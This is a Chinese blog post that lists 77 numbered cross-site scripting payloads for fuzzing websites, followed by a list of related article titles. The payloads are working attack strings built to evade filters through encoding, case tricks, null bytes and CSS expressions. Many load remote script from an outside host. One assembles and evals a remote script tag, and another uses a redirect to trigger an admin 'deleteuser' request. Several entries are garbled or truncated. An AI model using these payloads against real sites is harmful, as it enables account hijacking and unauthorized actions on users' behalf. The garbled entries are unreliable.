刚好刚才在fuzz一个站的时候用到,就从笔记里抛出来了。

code:

(1)普通的XSS JavaScript注入
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>(2)IMG标签XSS使用JavaScript命令
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>(3)IMG标签无分号无引号
<IMG SRC=javascript:alert(‘XSS’)> (4)IMG标签大小写不敏感 <IMG SRC=JaVaScRiPt:alert(‘XSS’)> (5)HTML编码(必须有分号) <IMG SRC=javascript:alert(“XSS”)> (6)修正缺陷IMG标签 <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”> (7)formCharCode标签(计算器) <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> (8)UTF-8的Unicode编码(计算器) <IMG SRC=jav..省略..S')> (9)7位的UTF-8的Unicode编码是没有分号的(计算器) <IMG SRC=jav..省略..S')> (10)十六进制编码也是没有分号(计算器) <IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29> (11)嵌入式标签,将Javascript分开 <IMG SRC=”jav ascript:alert(‘XSS’);”> (12)嵌入式编码标签,将Javascript分开 <IMG SRC=”jav ascript:alert(‘XSS’);”> (13)嵌入式换行符 <IMG SRC=”jav ascript:alert(‘XSS’);”> (14)嵌入式回车 <IMG SRC=”jav ascript:alert(‘XSS’);”> (15)嵌入式多行注入JavaScript,这是XSS极端的例子 <IMG SRC=”javascript:alert(‘XSS‘)”> (16)解决限制字符(要求同页面) <script>z=’document.’</script> <script>z=z+’write(“‘</script> <script>z=z+’<script’</script> <script>z=z+’ src=ht’</script> <script>z=z+’tp://ww’</script> <script>z=z+’w.shell’</script> <script>z=z+’.net/1.’</script> <script>z=z+’js></sc’</script> <script>z=z+’ript>”)’</script> <script>eval_r(z)</script> (17)空字符 perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用 perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out (19)Spaces和meta前的IMG标签 <IMG SRC=” javascript:alert(‘XSS’);”> (20)Non-alpha-non-digit XSS <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT> (21)Non-alpha-non-digit XSS to 2 <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)> (22)Non-alpha-non-digit XSS to 3 <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT> (23)双开括号 <<SCRIPT>alert(“XSS”);//<</SCRIPT> (24)无结束脚本标记(仅火狐等浏览器) <SCRIPT SRC=http://3w.org/XSS/xss.js?<B> (25)无结束脚本标记2 <SCRIPT SRC=//3w.org/XSS/xss.js> (26)半开的HTML/JavaScript XSS <IMG SRC=”javascript:alert(‘XSS’)” (27)双开角括号 <iframe src=http://3w.org/XSS.html < (28)无单引号 双引号 分号 <SCRIPT>a=/XSS/ alert(a.source)</SCRIPT> (29)换码过滤的JavaScript \”;alert(‘XSS’);// (30)结束Title标签 </TITLE><SCRIPT>alert(“XSS”);</SCRIPT> (31)Input Image <INPUT SRC=”javascript:alert(‘XSS’);”> (32)BODY Image <BODY BACKGROUND=”javascript:alert(‘XSS’)”> (33)BODY标签 <BODY(‘XSS’)> (34)IMG Dynsrc <IMG DYNSRC=”javascript:alert(‘XSS’)”> (35)IMG Lowsrc <IMG LOWSRC=”javascript:alert(‘XSS’)”> (36)BGSOUND <BGSOUND SRC=”javascript:alert(‘XSS’);”> (37)STYLE sheet <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”> (38)远程样式表 <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”> (39)List-style-image(列表式) <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS (40)IMG VBscript <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS (41)META链接url <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”> (42)Iframe <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME> (43)Frame <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET> (44)Table <TABLE BACKGROUND=”javascript:alert(‘XSS’)”> (45)TD <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”> (46)DIV background-image <DIV STYLE=”background-image: none)”> (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279) <DIV STYLE=”background-image: none)”> (48)DIV expression <DIV STYLE=”width: expression_r(alert(‘XSS’));”> (49)STYLE属性分拆表达 <IMG STYLE=”xss:expression_r(alert(‘XSS’))”> (50)匿名STYLE(组成:开角号和一个字母开头) <XSS STYLE=”xss:expression_r(alert(‘XSS’))”> (51)STYLE background-image <STYLE>.XSS{background-image:none”);}</STYLE><A class="XSS"></A> (52)IMG STYLE方式 exppression(alert(“XSS”))’> (53)STYLE background <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE> (54)BASE <BASE HREF=”javascript:alert(‘XSS’);//”> (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED> (56)在flash中使用ActionScrpt可以混进你XSS的代码 a=”get”; b=”URL(\”"; c=”javascript:”; d=”alert(‘XSS’);\”)”; eval_r(a+b+c+d); (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上 <HTML xmlns:xss> <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”> <xss:xss>XSS</xss:xss> </HTML>  (58)如果过滤了你的JS你可以在图片里添加JS代码来利用 <SCRIPT SRC=””></SCRIPT>  (59)IMG嵌入式命令,可执行任意命令 <IMG SRC=”http://www.XXX.com/a.php?a=b”>  (60)IMG嵌入式命令(a.jpg在同服务器) Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser (61)绕符号过滤 <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>  (62) <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>  (63) <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>  (64) <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>  (65) <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>  (66) <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>  (67) <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>  (68)URL绕行 <A HREF=”http://127.0.0.1/”>XSS</A>  (69)URL编码 <A HREF=”http://3w.org”>XSS</A>  (70)IP十进制 <A HREF=”http://3232235521″>XSS</A>  (71)IP十六进制 <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>  (72)IP八进制 <A HREF=”http://0300.0250.0000.0001″>XSS</A>  (73)混合编码 <A HREF=”h tt p://6 6.000146.0×7.147/”">XSS</A>  (74)节省[http:] <A HREF=”//www.google.com/”>XSS</A>  (75)节省[www] <A HREF=”http://google.com/”>XSS</A>  (76)绝对点绝对DNS <A HREF=”http://www.google.com./”>XSS</A>  (77)javascript链接 <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>   

转载于:https://www.cnblogs.com/xishaonian/p/6003622.html

xss payload大全相关推荐

  1. Web安全系列(二):XSS 攻击进阶(初探 XSS Payload)

    什么是 XSS Payload 上一章我谈到了 XSS 攻击的几种分类以及形成的攻击的原理,并举了一些浅显的例子,接下来,我就阐述什么叫做 XSS Payload 以及从攻击者的角度来初探 XSS 攻 ...

  2. 终极万能XSS Payload

    前言: 在进行跨站脚本攻击的时候(xss),通常会需要我们通过插入的代码场景构造payload.就比较耗费时间,为了更方便的去测试漏洞,万能XSS payload就出现了 什么是万能XSS paylo ...

  3. msf生成payload大全

    前言 作者简介:不知名白帽,网络安全学习者. 博客主页:https://blog.csdn.net/m0_63127854?type=blog CTF-专栏:https://blog.csdn.net ...

  4. xss Payload

    来自某牛的网站:http://www.cnblogs.com/b1gstar/p/5783848.html Basic and advanced exploits for XSS proofs and ...

  5. 常用 XSS Payload

    (1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (2)IMG标签XSS使用JavaS ...

  6. xss payload收集

    打开xss之js,我们随意输入然后查看页内原码. 我们输入tmac 复制全文 我们尝试造成闭合,我们尝试造成闭合,输入x'</script><script>alert(docu ...

  7. 无需括号的xss payload

    兄弟们,事情是这样的,上周五我不是参加公司的新人训练营吗 可是没想到 糟糕的事情发生在了我身上 这件事情严重影响了我这周的学习与工作 你听我慢慢给你讲 由于疫情原因,这次的训练营只能在室内进行,约定的 ...

  8. XSS原理dvwaxssvalidator使用

    渗透COP之XSS原理&测试案例 1.什么是XSS 跨站脚本(Cross Site Scripting,XSS)是一种经常出现在web应用程序中的计算机安全漏洞.攻击者利用网站漏洞把恶意的代码 ...

  9. 渗透测试 ( 0 ) --- XSS、CSRF、文件上传、文件包含、反序列化漏洞

    漏洞数据库:https://www.exploit-db.com/google-hacking-database 1.渗透测试 实用 浏览器插件 chrome.edge 插件:搜索 cookie,安装 ...

最新文章

  1. 解决nohup: 忽略输入并把输出追加到“nohup.out“或者nohup: 忽略输入重定向错误到标准输出端
  2. matlab处理图片建系,求MATLAB处理一张图片,把图片放入坐标系,建立类似于经纬度的网格...
  3. 对页面制定区域进行打印,以及打印不显示页脚URL的方法
  4. Microsoft Dynamics CRM 2015 数据管理 之 如何批量导入数据到 正式区(二)系统自带示例数据 安装及教学...
  5. 《图解HTTP》读书笔记--第2章简单的HTTP协议
  6. Oracle 11gR2 安装 example(范例数据库)
  7. notepad运行python为啥与pycharm运行的结果不一样_零基础初学Python,需要装什么软件?...
  8. win10 uwp unix timestamp 时间戳 转 DateTime
  9. 数据库(二)tab补全功能,使数据库支持简体中文,日志管理,备份脚本
  10. I - Trade Gym - 100212I 网络流
  11. 苹果面向Mac发布英特尔处理器漏洞缓解措施
  12. 物理服务器转虚拟路径,服务器配置虚拟路径
  13. mysql 首次连接慢_mybatis+mysql,第一次数据库连接很慢怎么回事?
  14. 德保罗大学计算机专业,2020年德保罗大学排名TFE Times美国最佳计算机科学硕士专业排名第75...
  15. MQTT协议(四) 【PUBLISH】发布消息
  16. mysql++简单应用_MySQL简单应用之视图(view)
  17. CTGU实验6_2-创建借书存储过程
  18. 2023北京叶黄素展/北京视力矫正设备展/北京眼睛医学康复展
  19. 让更多人用到自己的代码,让信仰在风中飘扬
  20. wps底纹去不掉_WPS广告太多,关又关不掉,其实它有无广告的版本

热门文章

  1. 机器学习方法:回归(一):线性回归Linear regression
  2. 一键新机IGRIMACE手机在线源安装方式
  3. linux write的行为
  4. 左移 (<<) / 右移 (>>)注意细节
  5. Streamsets相关资料汇总
  6. Matlab求解给定系统稳态误差
  7. Android设置背景色
  8. 计算机网络 第3章 作业1
  9. 【Android】Android开源项目分类汇总
  10. java制作局域网聊天器_基于Java的局域网聊天工具